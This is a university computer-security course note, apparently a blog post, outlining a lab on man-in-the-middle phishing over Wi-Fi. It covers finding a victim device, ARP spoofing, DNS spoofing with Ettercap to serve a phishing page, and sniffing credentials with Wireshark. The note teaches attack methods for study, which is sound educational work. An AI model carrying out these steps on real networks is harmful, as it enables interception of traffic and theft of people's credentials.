[Intro. to Computer Security Course Note] Ch 24 (supplement 1)

Posted on Edited on Views: Word count in article: 2.2k Reading time ≈ 2 mins.

Ch24 Supplement. Phishing Attacks in Wi-Fi Networks

Goal

  • Understand how user credentials can be leaked by a man-in-the-middle phishing attack over Wi-Fi networks
  • Expected to learn
    • How to identify a victim’s device?
    • How to redirect the victim’s traffic to our attack machine?
    • How to steal user credential from intercepted data packets?
    • How to return phishing web pages to the victim?

Scenario

Four Tasks

  • Discover the IP/MAC addresses of a target victim device from a Wi-Fi network
  • Redirect all the traffic of the victim device to your attack device
  • Redirect the victim device to access a phishing web page
  • Launch a man-in-the-middle attack to steal the victim’s credential

Task I

  • Discover the IP/MAC addresses of a target victim device from a Wi-Fi network
    • e.g., using “Fing”

What is ARP (Address Resolution Protocol)

  • A communication protocol used for discovering the link layer (or MAC) address associated with a given IP
  • A request-response protocol whose messages are encapsulated by a link-layer protocol
  • Within the boundaries of a single network, never routed across interworking nodes

Task II

  • Redirect all the traffic of the victim device to your attack device
  • If the attack is successful
    • the victim’s traffic will be routed to the attacker for both uplink and downlink

What is DNS (Domain Name System) Service?

  • A hierarchical decentralized naming system for computers, services, or other resources connected to the Internet or a private network
  • The resolution of the hierarchical name space is done by a hierarchy of name servers
  • Each server is responsible (authoritative) for a contiguous portion of the DNS namespace called a zone
  • DNS server answer queries about hosts in its zone

DNS Address Resolution

  • Domain name resolvers determine the domain name servers responsible for the domain name in question by a sequence of queries starting with the right-most (top-level) domain label

Task III

  • Redirect the victim device to access a phishing web page
    • Launch DNS spoofing
    • e.g., using “Ettercap”
  • If the attack is successful
    • An access request to NCTU home page will be redirected to the attack server (140.113.207.243)
    • The attacker can reply with a fake, phishing web page

Task IV

  • Launch a man-in-the-middle attack to steal the victim’s credential
    • Launch ARP spoofing (but no DNS spoofing)
    • Use “Wireshark” to analyze your intercepted packets
    • Access a web page from the link
  • If the attack is successful
    • You can steal user credentials from the intercepted packets
  • Prerequisite: the web page cannot be encrypted